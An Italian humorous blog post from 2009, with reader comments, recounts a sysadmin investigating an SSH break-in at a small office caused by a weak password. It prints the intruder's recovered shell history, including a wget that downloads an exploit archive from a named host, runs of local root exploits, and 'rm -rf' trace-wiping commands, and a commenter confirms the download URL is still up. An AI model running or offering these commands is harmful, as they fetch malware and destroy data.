Storie dalla Sala Macchine

Home Page | Commenti | Articoli | Faq | Documenti | Ricerca | Archivio | Storie dalla Sala Macchine | Contribuire | Imposta lingua:en it | Login/Register

Cos'e' sta' roba?

Qualche tempo fa, un po' annoiato, mi sono messo a scrivere quello che succede nel mio ufficio. Rimuovendo i nomi per proteggere i colpevoli. Le "storie", pubblicate inizialmente sul gruppo it.comp.os.linux.sys, hanno trovato ricezione favorevole. Onde per cui, ho deciso di "preservarle" per i posteri.

Personaggi usuali:

IO - Sono io.
CL - Clueless Luser, normale utente, non capisce un tubo di computer anche se dovrebbe usarli, ma pensa di saperne molto di piu'.
UL - Uber Luser, manager di primo livello o project-manager, non ne sa molto di piu' (qualche volta di meno), ma prende il doppio di stipendio.
SL - SuperLuser, manager di livello elevato. Vedi sopra.
SUSL - Super-Ultra-Super-Luser, CEO o simile.
HR - Human Resource, persona impiegata nell'Amministrazione del Personale.
Bob - Tutto il personale del supporto tecnico si chiama Bob. Seriamente.

Vedi anche le FAQ.

Cracking Time

Sono le sette (7) di mattina, ho appena finito di fare colazione e leggermi il giornale e mi sto avviando verso la doccia quando mi suona il cellofono. Rispondo chiedendomi chi piffero mi chiama a cotesta antelucana ora.

B - D? Sono B. Senti, qui e' successo un casino dovresti venire a dare un occhiata.

Non devo dire come e' che B ha il mio numero di cellofono eh?

IO - ? Io? Alle sette di mattina? E perche' io?
B - Ti ricordi l'altra volta quando abbiamo scoperto quei PC di $noivendiamoariafritta nell'armadio? Ecco, ci sono altri problemi e penso che dovresti dare un occhiata a qualche cosa.
IO - Hemmm... io dovrei andare in ufficio...
B - Chiamo DB e gli dico che vieni qui per fare una cosa importantissima.
IO - Ma seriamente, non potete aspettare nel pom...
B - Nooooo!!!!!

Comunque, dopo un certo tira-e-molla ed una chiamata diretta a DB che da la sua benedizione (e la mia doccia per ritornare in forma quasi umana), mi dirigo verso $noivendiamobigliettisuinternet (che in effetti sta a 5 km da casa mia).

Li' B mi agguanta e mi spiega che succede.

B - Allora, stamani la nostra receptionista e' arrivata molto presto e non riusciva a leggere la sua posta.
IO - E che c'e' di strano? Si sara' scordata la password.
B - No, non si era scordata la password, perche' non la cambia mai, ma qualcuno l'aveva cambiata per lei e no non sono stata io a cambiarla e si io sono l'unica che puo' cambiare le password degli utenti.
IO - (aspettando il seguito) ...e?
B - Da quando in qua le password si cambiano da sole?
IO - Huemmm... di solito non succede. Vabbe' vediamo sta cosa.

Cosi' andiamo in Sala Macchine, perche' B (ragazza intelligente) ha staccato il cavo di rete del server di posta interno, che fa anche da gateway verso internet per l'ufficio. Attacco una tastiera ed un monitor e guardo. Un 'last' mi dice che gli unici che hanno fatto login sono B dalla console alle 7 di mattina e UL di $noivendiamoariafritta via SSH alle 2 del mattino... Quest'ultimo risulta aver fatto login da un IP di AOL. Qui gatta ci cova.

Un controllino nella homedir di UL la rivela vuota. Vuota. Sento puzza di bruciato. Come minimo dovrebbe esserci un .bash_history se ha fatto login via SSH.

Un controllo nel log di sistema mi dice che "UL" ha sbagliato password 2 volte prima di accedere. Non sembra un brute-force attack.

Sfodero la chiavetta USB ed installo il mio root-kit-test, un controllo non riporta cose strane. Un rapido test mi dice che gli unici files modificati in /etc sono /etc/passwd ed /etc/shadow, ma a questo punto non sono del tutto sicuro di quanto posso fidarmi di questa macchina.

IO - Mi sa che hai fatto bene a chiamarmi e che questa macchina dovra essere reinstallata, tanto per stare sul sicuro. Sai mica che password aveva UL?
B - Non lo so ma posso scoprirlo.
IO - Ok, tu vai e scopri che io vedo qui che posso scoprire.

Mi viene in mente a quel punto che il backup parte alle 2.30, e magari ha 'salvato' qualche cosa di interessante. Quindi guardo sul disco USB (che viene montato e smontato dalla procedura di backup) e vedo che la directory di UL non e' vuota nel backup di ieri. O gioia. Cosi' riesco a scovare questo interessante frammento di storia: 


w
uname -a 
ps aux 
ls -a
last
ps aux 
mailq 
ls -a
cat /etc/issue 
ps ax 
wget makingcash.ucoz.co.uk/Muistul.tgz
tar xzvf Muistul.tgz 
cd .local/
./2007
./raptor 
ls
ps aux 
last root
ps ax 
uname -a 
cat /etc/passwd
su receptions
su B
su SL
su CL
su ...
cat /etc/passwd
su ...
su ...
su ...
ls -a
cd /tmp
ls -a
rm -rf .* * 
cd /var/tmp
ls -a
rm -rf .* * 
cd ~
ls -a
cat .bash_history
rm -rf .* * 
passwd
ps aux 
ls -a
last
clear 
cat /etc/issue 
exit
"makingcash" eh? Un rapido controllo mi dice che quel file contiene un paio di local root exploit, che purtroppo per il nostro sedicente cracker, non funzionano su questo kernel. Il tipo non mi sembra poi tanto scafato, io avrei cercato di fare login su altre macchine della rete, questo invece sembra si sia concentrato solo su questa e neanche tanto. Ma il 'su' verso la receptionista ha funzionato, quindi controllo il .bash_history della receptionista e vedo che il tipo ha cambiato la password (confermando i sospetti di B) e poco altro.

Gli altri "su" non hanno dato frutti. Un dubbio atroce mi piglia e controllo. No, per fortuna UL non era in sudo. Non che il tipo ci abbia provato comunque.

B ritorna con una faccia schifata.

B - Ci crederesti? La sua password era $nomediUL123.
IO - E adesso e' "seilicenziatoidiota"?
B - Dimmi che non ci e' entrato dentro qualcuno!
IO - Sorry. Ma si', e' entrato dentro qualcuno. Ma non mi sembra che abbia fatto molto. In ogni caso l'unico accesso che aveva era in questa macchina no? Quindi anche se aveva una password idiota non ha potuto fare danni altrove. Vedi che a volte il non avere un sistema di autenticazione centralizzato e' un bene?

A questo punto B ha insistito per offrirmi la colazione nel baretto all'angolo e poi ho speso il resto della giornata reinstallando la macchina e controllando gli altri sistemi dell'ufficio. Dai discorsi che ho udito non credo che $noivendiamoariafritta vendera molto in questo posto.

Davide
12/01/2009 08:30

Precedente Successivo

Commenti

I commenti sono aggiunti quando e soprattutto se ho il tempo di guardarli e dopo aver eliminato le cagate, spam, tentativi di phishing et similia. Quindi non trattenete il respiro.

50 messaggi this document does not accept new posts
Gama

Un buon modo per iniziare la giornata Di Gama postato il 12/01/2009 08:18

Le telefonate mattutine di lavoro (ogni riferimento a quella che io ho ricevuto il 31 dicembre mentre ero in ferie e' puramente voluta) sono una delle cose meno gradite del pianeta. Per fortuna B e' dotata di cellule cerebrali funzionanti e a quanto pare priva dell'istinto a correre in tondo urlando.

Grazie come sempre per il buon inizio settimana, ora posso ricominciare il lavoro di disinfestazione cominciato il 31: le uniche macchine che non sono state toccate dalla bestiaccia e i server linux.

Gama

-- Gama

Kaspa

Data Di Kaspa postato il 12/01/2009 08:19

Mi sa che hai qualche problema con le date....
Com'è che sta storia è del 1/1/1970?

-- Kaspa

Davide Bianchi

-AT- Kaspa Di Davide Bianchi postato il 12/01/2009 08:31

> Mi sa che hai qualche problema con le date....
> Com'è che sta storia è del 1/1/1970?

Lo script non ha aggiornato correttamente la data di pubblicazione.

-- Davide Bianchi

Eugenio Dorigati

Che dolce risveglio...... Di Eugenio Dorigati postato il 12/01/2009 08:53

Immagino la tua felicità ne ricevere una chiamata di emergenza appena sveglio.
Come ha detto Gama, almeno l'interlocutore non ha invocato il tuo aiuto a vanvera.

-- Eugenio Dorigati

RaDu

subject Di RaDu postato il 12/01/2009 08:54

Mi è quasi venuto un colpo stamattina quando sui feed non ho trovato la storia !!! non funziano più i Feed??

-- RaDu

Davide Bianchi

-AT- RaDu Di Davide Bianchi postato il 12/01/2009 09:23

> Mi è quasi venuto un colpo stamattina quando sui feed non ho trovato la storia !!! non funziano più i Feed??

Yup. Cambiato certificato ssl e dimenticato di cambiare il nome.

-- Davide Bianchi

Gama

Signature Di Gama postato il 12/01/2009 08:55

Domanda: la signature inserita nel profilo utente non viene inserita al termine del messaggio in automatico?
Se la risposta e' "si" allora c'e' qualcosa che non va: ho impostato una signature ma, per lo meno nell'ultimo messaggio, non viene visualizzata.

Vediamo se d'ora in poi mi ricordo di non firmarmi visto che il nome viene messo in automatico! 8-\)

-- Gama

Cobra78

Non tutto il male viene per nuocere.... Di Cobra78 postato il 12/01/2009 09:17

.....soprattutto se B è carina e non impegnata!

-- Cobra78

johnnymnemonic

Brutti ricordi Di johnnymnemonic postato il 12/01/2009 09:56

Sembra proprio quello che è successo in ufficio qualche tempo fa, purtroppo li si parlava del server e l'exploit *ha funzionato*
Risultato: due giorni per reinstallare tutto e giro di vite su password e policy di accesso

-- johnnymnemonic

noob

E ci risiamo... Di noob postato il 12/01/2009 10:06

A quanto pare nonostante lo "scherzo" dell'altra volta questi di $noivendiamoariafritta continuano a credere che un sistema sicuro è uno col server dentro un armadio chiuso a chiave e che diventa inviolabile se ci metti anche una guardia...

-- Matteo Ricci

Daniele Levi

Exploit Di Daniele Levi postato il 12/01/2009 10:10

Da noi il peggiore "exploit" è stato un utente (sic!!) a cui è stato rubato il PC completo di connect card e token rss.

Inutile dire che sullo schermo del pc c'era un bellissimo post it con password ed istruzioni per accedere tramite connect card...

... l'exploit è stato che il somaro ha realizzato che aveva subito il furto 3 giorni dopo (il lunedì-) e quindi il ladruncolo aveva avuto tutto il tempo di entrare nei sistemi indisturbato. Per fortuna si era limitato a mandare in giro qualche e-mail spiritosa.

-- Daniele Levi

Daniele G.

subject Di Daniele G. postato il 12/01/2009 10:22

Ammiro B ogni storia di più :-\)

-- Daniele G.

Davide Bianchi

-AT- Daniele G. Di Davide Bianchi postato il 12/01/2009 12:30

> Ammiro B ogni storia di più

E non l'hai vista di persona...

-- Davide Bianchi

mau

dipende... Di mau postato il 12/01/2009 18:54

dipende com'è... magari è una donna libera ;-\)
(e magari gradevole alla vista)

-- mau

Herr Franz

cose varie Di Herr Franz postato il 12/01/2009 11:10

Ringrazia il cielo che non era anche domenica...sennò avresti passato un bel week end di paura...
ps: quando mi sono registrato mi ha detto che il tuo certificato è una schifezza ed ho dovuto aggiungere un'eccezione...è normale?
pps:quando arriva la prima email di rihiesta "ma sei davvero tu he hai chiesto una password qui?" non sarebbe una cattiva idea inserire un riferimento a softland. Io ho capito che era tuo solo perchè venivo chiamato herr franz e di solito mi iscrivo come maddragon...

-- Herr Franz

Davide Bianchi

-AT- Herr Franz Di Davide Bianchi postato il 12/01/2009 12:31

> Ringrazia il cielo che non era anche domenica...sennò avresti passato un bel week end di paura...

Ecco perche' tengo il cellofono spento al fine settimana.

> ps: quando mi sono registrato mi ha detto che il tuo certificato è una schifezza ed ho dovuto aggiungere un'eccezione...è normale?

Se tu mi paghi un vero certificato...

> pps:quando arriva la prima email di rihiesta "ma sei davvero tu he hai chiesto una password qui?" non sarebbe una cattiva idea inserire un riferimento a softland.

Se sei tu che hai richiesto la login, capisci, se non sei tu, che te frega?

-- Davide Bianchi

dpantaleo

groan... Di dpantaleo postato il 12/01/2009 11:20

... sono estremamente deluso! questo tentativo era mooolto al di sotto della media, o sbaglio?

-AT- davide: quando fai lo zip delle storie del 2008, che così me le rileggo sul cellofono 8-\)

-- dpantaleo

Tommaso

dolce risveglio? Di Tommaso postato il 12/01/2009 11:25

dai bigD, non ti lamentare, se a svegliarti era un'altrO CL a caso ti andava molto peggio!
E comunque non credo ti dispiaccia di passare una giornata pagato con B, no? ;-\)

-- Tommaso

Dom

Sudo.. Di Dom postato il 12/01/2009 11:48

"Cit: No, per fortuna UL non era in sudo "

.. a quanto pare nn sono l'unico a mal tollerare sudo..

D. lo script che dice "welcom back 'user' your last login etc etc.. mi fa schiantare opera.. nn chiedermi il perchè però..

-- Dom

Davide Bianchi

-AT- Dom Di Davide Bianchi postato il 12/01/2009 12:33

> "Cit: No, per fortuna UL non era in sudo "
>
> .. a quanto pare nn sono l'unico a mal tollerare sudo..

Se devo scegliere tra dare in giro la password di root e sudo, scelgo sudo.

> D. lo script che dice "welcom back 'user' your last login etc etc.. mi fa schiantare opera.. nn chiedermi il perchè però..

E' un banalissimo "alert" in Javascript. Ok che io penso che javascript dovrebbe essere rimosso dall'universo pero'...

-- Davide Bianchi

filippo

Sudo ma Godo ? Di filippo postato il 12/01/2009 14:57

Preferivo il caro buon vecchio su (che mi ricordava un mio caro amico indiano).
Si fare ogni cosa con sudo (il server non l'ho messo in piedi io) alla fine di rompo e sudo su (e quindi se faccio vaccate le faccio di razza).
+1 Ai disaccordi con il SUDO

-- filippo

Andrea Ballarati

sudo Di Andrea Ballarati postato il 13/01/2009 09:01

Mah se devo impartire uno o due comandi sudo va benissimo, se devo dare una sequenza lunga faccio sudo su. e qui non vedo la differenza a fare su (a parte 5 keystrokes). +1 per sudo.

-- Andrea Ballarati

Tommaso

+1 x sudo Di Tommaso postato il 13/01/2009 09:38

Perche' tutta questa avversione per sudo?
Se qualche utente deve lanciare ogni tanto qualche programma/script con i permessi di root, sudo e' perfetto.
Se sono troppi comandi, forse e' il caso di dare la password di root, ma senza accesso diretto da console e ssh, almeno saprai chi ha fatto il danno...
Se dai a pigs & dogs i permessi di sudo e gli permetti di fare "sudo su", allora tanto vale dare la password di root. Si lo so che e' piu' rapido che dare per ogni script/programma i permessi, ma se concedi troppo non sarai piu' tu il sistemista...

-- Tommaso

spacexplorer

Hum... Di spacexplorer postato il 12/01/2009 12:40

Qualche bacchettata ha chi ha fatto il "sistema" da B ci
andrebbe pero` (posta interna e gw sulla stessa macchina,
pass o non forzatamente cambiate a tempo, o comunque nessun
impedimento a (ri)mettere la stessa, mi sembra un ssh con
pass senza chiave, "bkup" direttamente sul server)...

Perche` non proponi un mini-pc tipo il tuo audioserver come gw
e/o come mini logstation che replica i log delle macchine piu`
importanti (una jail per macchina, chflags sappnd per ogni log
con securlevel a 3)?

Grazie di nuovo per la "compagnia del lunedi`" (che con i
"commenti" dura tutta la settimana)! Fammi sapere per il css :-\)

-- spacexplorer

Daniele

non male Di Daniele postato il 12/01/2009 12:40

Gli script kiddies sono la rovina del secolo, ma sono anche divertenti a volte

-- Daniele

Gabriele Corrieri

subject Di Gabriele Corrieri postato il 12/01/2009 13:14

Ciao D ma perchè hai tanto 'posteriore' che hai trovato nei fondi del caffè (aka il backup) i segni ... a me minimo qualsiasi cosa che lontanamente può andare rovescia (murphy docet) va SICURAMENTE rovescia.

Gabriele

-- Gabriele Corrieri

Andrea Occhi

-AT- Gabriele Corrieri Di Andrea Occhi postato il 14/01/2009 17:26

> Ciao D ma perchè hai tanto 'posteriore' che hai trovato nei fondi del caffè (aka il backup) i segni ... a me minimo qualsiasi cosa che lontanamente può andare rovescia (murphy docet) va SICURAMENTE rovescia.
Vedila al contrario: allo script kiddie è andata rovescia.
Murpy non si smentisce MAI
>
> Gabriele
> --
> Gabriele Corrieri

-- Andrea Occhi

checkitout3

root exploit Di checkitout3 postato il 12/01/2009 13:26

ciao, ti seguo da anni e solo mi sono deciso a scriverti qualcosa...
ma a proposito di quel sito ce contiene un rootkit... non c'è modo di segnalarlo come abuse al mantainer del sito? IMHO per chi deve ogni giorno mantenere funzionanti tot server stì rompiscatole bisognerebbe segarli..
Complimenti cmq

-- checkitout3

Davide Bianchi

-AT- checkitout3 Di Davide Bianchi postato il 12/01/2009 14:39

> ciao, ti seguo da anni e solo mi sono deciso a scriverti qualcosa...
> ma a proposito di quel sito ce contiene un rootkit... non c'è modo di segnalarlo come abuse al mantainer del sito?

Gia' fatto, ma pensi che gliene freghi qualche cosa?

-- Davide Bianchi

checkitout3

root exploit Di checkitout3 postato il 12/01/2009 15:03

mm penso di no visto che lo dici così, ma portando i log del cracker agli organi competenti penso di si... (spero almeno)

(funge il rispondi anche per i (l)user o solo per te?)

-- checkitout3

Davide Bianchi

-AT- checkitout3 Di Davide Bianchi postato il 12/01/2009 15:05

> (funge il rispondi anche per i (l)user o solo per te?)

Il "rispondi" dovrebbe funzicare per tutti.

-- Davide Bianchi

Nik

... Di Nik postato il 12/01/2009 19:04

il mio primo messaggio da utente registrato! che bello...

beh, che dire.. quelli di $noivendiamoariafritta sono riusciti a superare se stessi.. forse quell'UL voleva il primato aziendale di idiozia?

-- Nik

Mick Zio Zero

Maaaa.... Di Mick Zio Zero postato il 12/01/2009 22:01

....quelli di $noivendiamoariafritta sperano di coprire con la puzza di olio tutti gli intrallazzi che cercano di fare in background?

-- Mick Zio Zero

kache

Bello Di kache postato il 12/01/2009 23:53

Carino il nuovo sistema dei commenti, anche se 5KB di PNG sono davvero troppo pochi.
Potresti, per favore, aumentare la dimensione o permettere di uppare jpg?

-- kache

Davide Bianchi

-AT- kache Di Davide Bianchi postato il 13/01/2009 08:31

> Carino il nuovo sistema dei commenti, anche se 5KB di PNG sono davvero troppo pochi.

Quanto cappero vuoi farla una immagine che, in ogni caso, e' 24x24 pixels?

-- Davide Bianchi

Gabriele Corrieri

... Di Gabriele Corrieri postato il 13/01/2009 00:54

Ciao

non so come non so cosa ma

makingcash.ucoz.co.uk/Muistul.tgz

è ancora in quel posto ... alla faccia del fatto che di fronte a denunce l'ISP dovrebbe ...

vabbè ...

-- Gabriele Corrieri

maxxfi

The bold and the red Di maxxfi postato il 13/01/2009 09:05

Carino il sistema dei commenti.
Se non costa molta fatica, IMVHO non sarebbe male evidenziare i nomi registrati p.es. in grassetto e quello di Davide in rosso.

Riguardo al letto, consiglio anch'io IKEA (se ce n'e' uno vicino).
E' relativamente economico ma soprattutto e' hacker-friendly ;-\)

-- maxxfi

Diego

subject Di Diego postato il 13/01/2009 13:10

Quando il backup c'è e funziona è sempre una soddisfazione.
Complimenti per l'immediata soluzione del problema, per un intervento del genere ti avrebbero dovuto pagare uno stipendio intero

Concordo con maxxfi per bold & red e aggiungo che sui form di login e commenti il carattere nero sullo sfondo blu non è il massimo della leggibilità (siamo rompimaroni, lo so )

P.S. oggi sei andato a lavoro in moto o con i pattini da ghiaccio?
http://www.repubblica.it/2006/05/gallerie/cronaca/amsterdam-mare-ghiacciato/1.html

--
Diego

Davide Bianchi

-AT- Diego Di Davide Bianchi postato il 13/01/2009 14:25

> P.S. oggi sei andato a lavoro in moto o con i pattini da ghiaccio?

In macchina. Sono matti si', mica scemo.

-- Davide Bianchi

Davide Bianchi

-AT- Diego Di Davide Bianchi postato il 13/01/2009 14:48

> Concordo con maxxfi per bold & red e aggiungo che sui form di login e commenti il carattere nero sullo sfondo blu non è il massimo della leggibilità (siamo rompimaroni, lo so )

Ok, dovrebbe essere a posto (il colore almeno).

-- Davide Bianchi

Samuel

AAA Di Samuel postato il 13/01/2009 18:06

ciao
complimenti per il sito e soprattutto per le storie... si comincia bene la settimana leggendoti :-\)

Faccio anche una proposta costruttiva (spero) al sito:

per postare un messaggio, senza quotare (rispondi) ad un post precedente bisogna risalire l'elenco dei messaggi inseriti, si potrebbe inserire anche questo link in coda ai messaggi postati?

grazie

-- Samuel

Davide Bianchi

-AT- Samuel Di Davide Bianchi postato il 13/01/2009 18:49

> per postare un messaggio, senza quotare (rispondi) ad un post precedente bisogna risalire l'elenco dei messaggi inseriti, si potrebbe inserire anche questo link in coda ai messaggi postati?

Aggiunto.

-- Davide Bianchi

Thurill-AT-gmail.com

scafato? Di Thurill-AT-gmail.com postato il 14/01/2009 14:02

Ci mancava che nella pass ci infilasse anche la via dove trovarlo...

Buona settimana D.

-- Thurill-AT-gmail.com

Lo Zeno

-AT- Thurill-AT-gmail.com Di Lo Zeno postato il 15/01/2009 13:58

> Ci mancava che nella pass ci infilasse anche la via dove trovarlo...

Già visto: un signore dove vivo io, a cui avevo installato un router Wi-Fi (per fargli un favore perché il figlio non voleva alzare le chiappe), usando come motivazione che la password che avevo messo io era "difficile da ricordare" ha fatto mettere al figlio, come password, il cognome + la via + il numero di casa.

A nulla è valso far notare che la password del DHCP viene memorizzata nel computer e non occorre ridigitarla.

-- Lo Zeno

Davide Inglima

non funzionano su questo kernel Di Davide Inglima postato il 15/01/2009 21:02

Ricordo quando degli imbecilli provarono a crackare l'aula unix da noi. Peccato che pur avendo rubato le credenziali ai compagni poi tentarono di hackerare una macchina Solaris SPARC con un exploit per Solaris INTEL (no, non potevano hackerare le intel perché era per una versione precedente dell'exploit).

-- Davide Inglima

kallsu

Un buon modo di iniziare la giornata (2) Di kallsu postato il 16/01/2009 21:18

Sabato mattina, come te Davide, subito dopo aver fatto colazione, telefonata del sistemista1, sistemista-capo e TheBoss ...

Ho maledetto l'orrido programmatore in vacanza per giorni e giorni, comunque appena tornato ha scontato tributo pagando colazioni per 1 mese di fila !

-- kallsu

Davide Bianchi

-AT- kallsu Di Davide Bianchi postato il 17/01/2009 08:39

> Ho maledetto l'orrido programmatore in vacanza per giorni e giorni, comunque appena tornato ha scontato tributo pagando colazioni per 1 mese di fila !

Bhe', fa piacere vedere che c'e' una certa giustizia nel mondo. ;-\)

-- Davide Bianchi

soichiro

quando il caso ci mette lo zampino ..... Di soichiro postato il 17/01/2009 22:56

Proprio 10 minuti fa mi chiama un'amica di famiglia per chiedermi se posso reinstallarle, per l'ennesima volta, il sistema visto che gliel'hanno "HECHARATO" :-\)(mettere su un firewall & un antivir serio non symacoso o il merdaviglioso affare che danno con alice di telecom italia no eh? o_O ).

Qui in italia il numero dei sistemi craccati/infetti in giro deve essere enorme a causa dell'ignoranza che vige in ambito informatico, dico solo che un ragazzino di 15 anni(ora ne ha di più ma le conoscenze latitano sempre) è stato acclamato dai media come esperto di sicurezza informatica :| , solo perchè scrive(va) guide for dummies e propone servizi assurdi (tra cui un sicurissimo sistema gratuito di gestione delle password via web :F )

Tornando alla storia che aspetta il management di $noivendiamobigliettisuinternet(o in alternativa B) a mettere il cartello io non posso entrare con la faccia degli ul di $noivendiamoariafritta dopo aver sbattuto fuori dalla finestra i serwer ???

-- soichiro

Davide Bianchi

-AT- soichiro Di Davide Bianchi postato il 18/01/2009 09:17

> Qui in italia il numero dei sistemi craccati/infetti in giro deve essere enorme a causa dell'ignoranza che vige in ambito informatico

La mia esperienza dice che non e' "solo" in Italia.

> assurdi (tra cui un sicurissimo sistema gratuito di gestione delle password via web :F )

Se non ha un certificato SSL firmato da "Snake Oil ltd" ne sa gia' piu' di altra gente che conosco...

-- Davide Bianchi

mk

file scaricato Di mk postato il 20/03/2009 12:08

Ho provato a dare in pasto ClamWin il file che hai indicato, questo è il report:


Linux.Osf.3974 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 526808
Engine version: 0.94.1
Scanned directories: 0
Scanned files: 1
Infected files: 1

-- mk

50 messaggi this document does not accept new posts

Precedente Successivo

Copyright

Il presente sito e' frutto del sudore della mia fronte (e delle mie dita), se siete interessati a ripubblicare uno degli articoli, documenti o qualunque altra cosa presente in questo sito per cortesia datemene comunicazione (o all'autore dell'articolo se non sono io), cosi' il giorno che faccio delle aggiunte potro' avvisarvi e magari mandarvi il testo aggiornato.

Questo sito era composto con VIM, ora e' composto con VIM ed il famosissimo CMS FdT.

Questo sito non e' ottimizzato per la visione con nessun browser particolare, ne' richiede l'uso di font particolari o risoluzioni speciali. Siete liberi di vederlo come vi pare e piace, o come disse qualcuno: "Finalmente uno dei POCHI siti che ancora funzionano con IE5 dentro Windows 3.1".

Web Interoperability Pleadge Support This Project
Powered By Gojira